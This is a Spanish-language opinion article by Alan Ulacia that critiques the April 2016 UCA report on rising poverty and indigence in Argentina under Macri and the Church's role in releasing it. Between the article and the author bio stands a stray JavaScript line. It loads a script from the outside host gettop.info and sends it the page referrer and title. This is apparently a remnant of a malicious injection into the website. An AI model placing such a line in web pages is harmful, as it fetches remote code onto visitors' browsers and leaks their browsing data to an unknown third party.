El informe de la UCA sobre pobreza e indigencia: ¿condiciones para una conmoción social?

 

Informe de pobreza de la UCA

Informe de pobreza de la UCA

LBF realiza una análisis en clave crítica del primer informe estadístico sobre el gobierno macrista. ¿Por qué el kirchnerismo evitaba medir la pobreza por “estigmatizante”? ¿Por qué la Iglesia Católica prende luces rojas a tan sólo a tres meses de asumir Mauricio Macri? 

Nota e ilustración: Alan Ulacia

El viernes 1 de abril, el Observatorio de la Deuda Social Argentina de la Universidad Católica Argentina (UCA) difundió las cifras de un informe sobre pobreza e indigencia. Los datos se pasearon por todos los diarios. Agua fresca para los molinos de una interna entre fracciones capitalistas que se profundiza día a día,

Según el estudio, durante el primer trimestre de 2016 la tasa de pobreza se ha incrementado del 29% a fines de 2015 al 34,5% en marzo de este año, lo que equivale a 1,4 millones arrojados a la pobreza, alcanzando ahora un total acumulado de 13 millones. A su vez, la tasa de indigencia habría pasado de 5,3% a fines de 2015 a 6,2% en marzo de 2016, es decir un aumento de por lo menos 350 mil personas en situación de indigencia, sobre un total de 2,5 millones. Cabe señalar que los informes de la UCA venían marcando un ascenso de la pobreza en los últimos años del kirchnerismo. Este ascenso explica el apagón estadístico (el último dato sobre pobreza del Indec es de 2013) y la justificación de Kicillof de no ‘estigmatizar’ a los pobres.

durante el primer trimestre de 2016 la tasa de pobreza se ha incrementado del 29% a fines de 2015 al 34,5% en marzo de este año

Pero lo realmente explosivo es aquello que el informe no llega a decir, lo que sugiere: pues estas cifras serían el saldo económico y social de los primeros 90 días de gobierno de Macri sin tomar en cuenta la brutal devaluación, los despidos, los recientes tarifazos y las medidas de ajuste que han instrumentado al unísono el macrismo y los gobernadores K. Es decir, que el estudio realiza las mencionadas proyecciones de marzo y abril de 2016 fundado en la variación de datos registrados durante el último trimestre de 2015, es más, el informe se realizó en base a fuentes secundarias de información como los índices de precios al consumidor (IPC) de la Ciudad de Buenos Aires y la provincia de San Luis, y datos de la Fundación de Investigaciones Económicas Latinoamericanas (FIEL), es decir, sin tener en cuenta las estadísticas oficiales de un INDEC que ya podría denominarse “zombie”.

el estudio realiza las mencionadas proyecciones de marzo y abril de 2016 fundado en la variación de datos registrados durante el último trimestre de 2015

De ser estos números reales, el llamado “gradualismo” del paquete ajustador que llevan a cabo tanto los macristas como los K (Alicia Kirchner en Santa Cruz, Bertone en Tierrra del Fuego) ya estaría materializando sus bondades sobre la espalda de los trabajadores. Por otro lado, cumple a rajatabla los requisitos que exige el salvavidas de plomo solicitado al capital financiero, votado a mano alzada por la coalición macrista-kirchnerista en el Senado. Devaluación, inflación, despidos y tarifazo es la lengua común, con sus ya visibles consecuencias, que se habla en medio de una disputa de poder que en el fondo defiende los mismos intereses sociales.

“Teníamos pensado dedicarnos a la presentación de un informe sobre pobreza y desigualdad de 2010 a 2015, pero ante la situación económica complicada vinculada al aumento del costo de vida y al actual proceso inflacionario nos vimos obligados a abordar la situación actual”, declaró Agustín Salvia, director del Observatorio de la UCA.

Resulta casi evidente que el origen de dicho recorte es político y tiene sede en el Vaticano. El ritmo de una crisis nacional e internacional que se profundiza, sin aparente fondo, revela la posibilidad de un Papa interviniendo desde Italia vía el mencionado informe, al antes macri-friendly diario Clarín publicándolo en su tapa para hacer lobby contra la empresa norteamericana Turner en varios negociados en disputa; y por último a Aníbal Fernández y Artemio López ponderándolo, cuando antes lo criticaban por “estigmatizar la pobreza”, mientras utilizaban bufonesca y falsamente los datos de la pobreza alemana para lavar culpas.

La difusión de este informe revela que la Iglesia Católica comienza a presentarse como “árbitro” de la socialmente catastrófica disputa entre fuerzas políticas y fracciones capitalistas, y prende luces rojas: las medidas del ajuste en curso estarían creando las condiciones de una conmoción social.

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Alan Ulacia

Alan Ulacia

Alan Martín Ulacia (1986) nació en Argentina, en el porteño barrio de Caballito. Es Licenciado en Ciencia Política (UBA), con una formación especializada en Filosofía Política. Trabajó como colaborador en diversas publicaciones y proyectos periodísticos: Diario Tiempo Argentino, plazademayo.com, Revista Devenir, elidentikit.com, entre otros. La ciudad imposible (2014), editado por Milena Cacerola, es su primer libro de crónicas y ensayos.
Alan Ulacia
Facebooktwittergoogle_plusredditpinterestmail

Publicado por .

Comentarios